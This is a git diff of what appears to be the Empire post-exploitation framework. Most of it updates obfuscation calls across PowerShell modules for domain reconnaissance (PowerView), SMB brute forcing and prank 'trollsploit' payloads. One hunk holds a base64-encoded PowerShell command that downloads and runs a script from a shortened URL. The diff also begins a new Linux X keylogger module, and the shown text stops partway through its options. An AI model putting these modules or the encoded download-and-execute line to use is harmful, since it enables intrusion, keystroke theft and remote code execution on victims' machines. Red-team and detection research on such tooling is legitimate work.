 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py
index 463840f..e39406c 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/find_managed_security_group.py
@@ -85,5 +85,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py
index 0a98d22..8f2dd50 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/find_user_field.py
@@ -103,5 +103,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py
index 0168052..c32c615 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_cached_rdpconnection.py
@@ -98,5 +98,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py
index b521180..94d2fc1 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_computer.py
@@ -132,5 +132,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py
index f527abf..9440c57 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_dfs_share.py
@@ -92,5 +92,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py
index d709597..fde07a3 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_controller.py
@@ -98,5 +98,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py
index 4a6d5cf..0fd2bb6 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_policy.py
@@ -119,5 +119,5 @@ class Module:
 else:
 script += moduleName + " " + pscript + ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed! Use ExpandObject option to expand one of the objects above such as \'System Access\'"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py
index 4b7189f..c90d258 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_domain_trust.py
@@ -98,5 +98,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py
index 49c34ae..0e49bdc4 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_fileserver.py
@@ -92,5 +92,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py
index 4ed84c1..5b713e5 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest.py
@@ -87,5 +87,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py
index 7c55217..0a0592f 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_forest_domain.py
@@ -87,5 +87,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py
index 28dd8ee..d4b2f82 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py
@@ -112,5 +112,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py
index 1932b95..52ba4bc 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_gpo_computer.py
@@ -109,5 +109,5 @@ class Module:
 script += '} | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py
index f21e51f..6157e14 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_group.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group.py
@@ -122,5 +122,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py
index 398e948..bf4e24f 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_group_member.py
@@ -122,5 +122,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py
index 0fc757f..6e79356 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_localgroup.py
@@ -108,5 +108,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py
index 3422d5d..c9744d1 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_loggedon.py
@@ -87,5 +87,5 @@ class Module:
 script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py
index 2acb7aa..ab03fc8 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_object_acl.py
@@ -133,5 +133,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py
index 15a4e90..1fc5981 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_ou.py
@@ -112,5 +112,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py
index ce408c8..8593fdd 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_rdp_session.py
@@ -88,5 +88,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py
index feea3fb..db906f7 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_session.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_session.py
@@ -87,5 +87,5 @@ class Module:
 script += ' | ft -wrap | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py
index e2889bc..374e0e9 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_site.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_site.py
@@ -112,5 +112,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py
index cfef751..e249a34 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_subnet.py
@@ -107,5 +107,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py
index 4ac729b..26b830c 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/get_user.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/get_user.py
@@ -122,5 +122,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py
index 764fc63..6bc3df3 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/map_domain_trust.py
@@ -92,5 +92,5 @@ class Module:
 script += '| ConvertTo-Csv -NoTypeInformation | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py
index 3120886..055c482 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/process_hunter.py
@@ -147,5 +147,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py
index 3c6379e..dfcd952 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/set_ad_object.py
@@ -124,5 +124,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py
index ba45584..3589dac 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/share_finder.py
@@ -122,5 +122,5 @@ class Module:
 script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py
index 05631cd..a1d2d15 100644
--- a/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py
+++ b/lib/modules/powershell/situational_awareness/network/powerview/user_hunter.py
@@ -158,5 +158,5 @@ class Module:
 script += ' | fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/reverse_dns.py b/lib/modules/powershell/situational_awareness/network/reverse_dns.py
index 26e3069..287c4eb 100644
--- a/lib/modules/powershell/situational_awareness/network/reverse_dns.py
+++ b/lib/modules/powershell/situational_awareness/network/reverse_dns.py
@@ -92,6 +92,6 @@ class Module:
 # only return objects where HostName is not an IP (i.e. the address resolves)
 scriptEnd += " | % {try{$entry=$_; $ipObj = [System.Net.IPAddress]::parse($entry.HostName); if(-not [System.Net.IPAddress]::tryparse([string]$_.HostName, [ref]$ipObj)) { $entry }} catch{$entry} } | Select-Object HostName, AddressList | ft -autosize | Out-String | %{$_ + \"`n\"}"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/smbautobrute.py b/lib/modules/powershell/situational_awareness/network/smbautobrute.py
index 8da9d7f..a8765fa 100644
--- a/lib/modules/powershell/situational_awareness/network/smbautobrute.py
+++ b/lib/modules/powershell/situational_awareness/network/smbautobrute.py
@@ -130,6 +130,6 @@ class Module:
 else:
 scriptEnd += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/situational_awareness/network/smbscanner.py b/lib/modules/powershell/situational_awareness/network/smbscanner.py
index b784693..c5c133d 100644
--- a/lib/modules/powershell/situational_awareness/network/smbscanner.py
+++ b/lib/modules/powershell/situational_awareness/network/smbscanner.py
@@ -133,6 +133,6 @@ class Module:
 scriptEnd += "| Out-String | %{$_ + \"`n\"};"
 scriptEnd += "'Invoke-SMBScanner completed'"
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/trollsploit/get_schwifty.py b/lib/modules/powershell/trollsploit/get_schwifty.py
index 90abefb..6f358e1 100644
--- a/lib/modules/powershell/trollsploit/get_schwifty.py
+++ b/lib/modules/powershell/trollsploit/get_schwifty.py
@@ -99,5 +99,5 @@ Function Get-Schwifty
 script += "; 'Agent is getting schwifty!'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/trollsploit/message.py b/lib/modules/powershell/trollsploit/message.py
index 78c31be..76b0635 100644
--- a/lib/modules/powershell/trollsploit/message.py
+++ b/lib/modules/powershell/trollsploit/message.py
@@ -95,5 +95,5 @@ Invoke-Message"""
 else:
 script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/trollsploit/process_killer.py b/lib/modules/powershell/trollsploit/process_killer.py
index 25ab191..89506f4 100644
--- a/lib/modules/powershell/trollsploit/process_killer.py
+++ b/lib/modules/powershell/trollsploit/process_killer.py
@@ -110,5 +110,5 @@ Invoke-ProcessKiller"""
 script += " -" + str(option) + " " + str(values['Value'])
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/trollsploit/rick_ascii.py b/lib/modules/powershell/trollsploit/rick_ascii.py
index 9cbdef0..774d580 100644
--- a/lib/modules/powershell/trollsploit/rick_ascii.py
+++ b/lib/modules/powershell/trollsploit/rick_ascii.py
@@ -55,5 +55,5 @@ class Module:
 # iex (New-Object Net.WebClient).DownloadString("http://bit.ly/e0Mw9w")
 script = "$Null = Start-Process -WindowStyle Maximized -FilePath \"C:\Windows\System32\WindowsPowerShell\\v1.0\powershell.exe\" -ArgumentList \"-enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYgBpAHQALgBsAHkALwBlADAATQB3ADkAdwAiACkA\"; 'Client Rick-Asciied!'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/trollsploit/rick_astley.py b/lib/modules/powershell/trollsploit/rick_astley.py
index 733aa87..6e19f56 100644
--- a/lib/modules/powershell/trollsploit/rick_astley.py
+++ b/lib/modules/powershell/trollsploit/rick_astley.py
@@ -72,6 +72,6 @@ class Module:
 scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
 if obfuscate:
- scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
+ scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
 script += scriptEnd
 return script
diff --git a/lib/modules/powershell/trollsploit/thunderstruck.py b/lib/modules/powershell/trollsploit/thunderstruck.py
index 041b259..00b426e 100644
--- a/lib/modules/powershell/trollsploit/thunderstruck.py
+++ b/lib/modules/powershell/trollsploit/thunderstruck.py
@@ -99,5 +99,5 @@ Function Invoke-Thunderstruck
 script += "; 'Agent Thunderstruck.'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/trollsploit/voicetroll.py b/lib/modules/powershell/trollsploit/voicetroll.py
index 2d0eb80..1e7e021 100644
--- a/lib/modules/powershell/trollsploit/voicetroll.py
+++ b/lib/modules/powershell/trollsploit/voicetroll.py
@@ -85,5 +85,5 @@ Invoke-VoiceTroll"""
 else:
 script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/trollsploit/wallpaper.py b/lib/modules/powershell/trollsploit/wallpaper.py
index cdb21c5..d970f24 100644
--- a/lib/modules/powershell/trollsploit/wallpaper.py
+++ b/lib/modules/powershell/trollsploit/wallpaper.py
@@ -143,5 +143,5 @@ namespace Wallpaper
 script += "; 'Set-Wallpaper executed'"
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/powershell/trollsploit/wlmdr.py b/lib/modules/powershell/trollsploit/wlmdr.py
index 62d76a9..f647c6d 100644
--- a/lib/modules/powershell/trollsploit/wlmdr.py
+++ b/lib/modules/powershell/trollsploit/wlmdr.py
@@ -108,5 +108,5 @@ Invoke-Wlrmdr"""
 else:
 script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\""
 if obfuscate:
- script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand)
+ script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
 return script
diff --git a/lib/modules/python/collection/linux/xkeylogger.py b/lib/modules/python/collection/linux/xkeylogger.py
new file mode 100644
index 0000000..090d23e
--- /dev/null
+++ b/lib/modules/python/collection/linux/xkeylogger.py
@@ -0,0 +1,789 @@
+class Module:
+
+ def __init__(self, mainMenu, params=[]):
+
+ # metadata info about the module, not modified during runtime
+ self.info = {
+ # name for the module that will appear in module menus
+ 'Name': 'Keylog',
+
+ # list of one or more authors for the module
+ 'Author': ['Nikaiw'],
+
+ # more verbose multi-line description of the module
+ 'Description': ("X userland keylogger based on pupy"),
+
+ # True if the module needs to run in the background
+ 'Background': True,
+
+ # File extension to save the file as
+ 'OutputExtension': "",
+
+ # if the module needs administrative privileges
+ 'NeedsAdmin': False,
+
+ # True if the method doesn't touch disk/is reasonably opsec safe
+ 'OpsecSafe': True,
+
+ # the module language
+ 'Language' : 'python',
+
+ # the minimum language version needed
+ 'MinLanguageVersion' : '2.6',
+
+ # list of any references/other comments
+ 'Comments': [
+ "WIP, might miss some keys, can't kill agent sometimes"
+ ]
+ }
+
+ # any options needed by the module, settable during runtime
+ self.options = {
+ # format:
+ # value_name : {description, required, default_value}
+ 'Agent': {
+ # The 'Agent' option is the only one that MUST be in a module
+ 'Description' : 'Agent to keylog.',
+ 'Required' : True,
+ 'Value' : ''
+ },
+ }
+
+ # save off a copy of the mainMenu object to access external functionality
+ # like listeners/agent handlers/etc.
+ self.mainMenu = mainMenu
+
+ # During instantiation, any settable option parameters
+ # are passed as an object set to the module and the
+ # options dictionary is automatically set. 
